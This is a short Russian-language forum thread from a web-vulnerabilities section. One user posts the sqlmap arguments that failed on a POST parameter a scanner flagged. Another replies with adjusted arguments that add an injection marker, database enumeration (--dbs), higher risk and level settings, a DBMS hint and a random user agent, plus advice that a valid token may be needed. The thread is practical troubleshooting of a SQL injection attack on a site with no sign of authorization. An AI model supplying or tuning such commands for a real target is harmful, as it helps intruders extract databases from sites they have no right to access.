Нужна помощь SQLMAP

Discussion in 'Веб-уязвимости' started by qwerty1qwerty, 19 Jan 2020.

  1. qwerty1qwerty

    qwerty1qwerty New Member

    Joined:
    9 Jun 2018
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Сканер показал что в параметре random есть иньекция. Смотрю исходник где показал вроде как есть. Но Не работает map, и выдает странную ошибку.Впервые такое,гугл не помог. Что я не так делаю???



    [​IMG]





    -u https://site.com --data "code=94102&month=01&random=%5c&year=2015&_token=Amkrx5wyiyqwZKS0sJgkFKIqylbSCE61TpRgo8ME" -p "random" --method POST --risk=3 --random-agent
     
  2. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    385
    Likes Received:
    261
    Reputations:
    3
    --url "https://site.com" --data="code=94102&month=01&random=*&year=2015&_token=Amkrx5wyiyqwZKS0sJgkFKIqylbSCE61TpRgo8ME" --dbs --risk=3 --level=3 --dbms=mysql(или что там у тебя) --random-agent
    B сканерам верить такое себе, часто просто ложное срабатывание. Подозреваю что токен валидный нужен
     
    #2 karkajoi, 19 Jan 2020
    Last edited: 19 Jan 2020
Loading...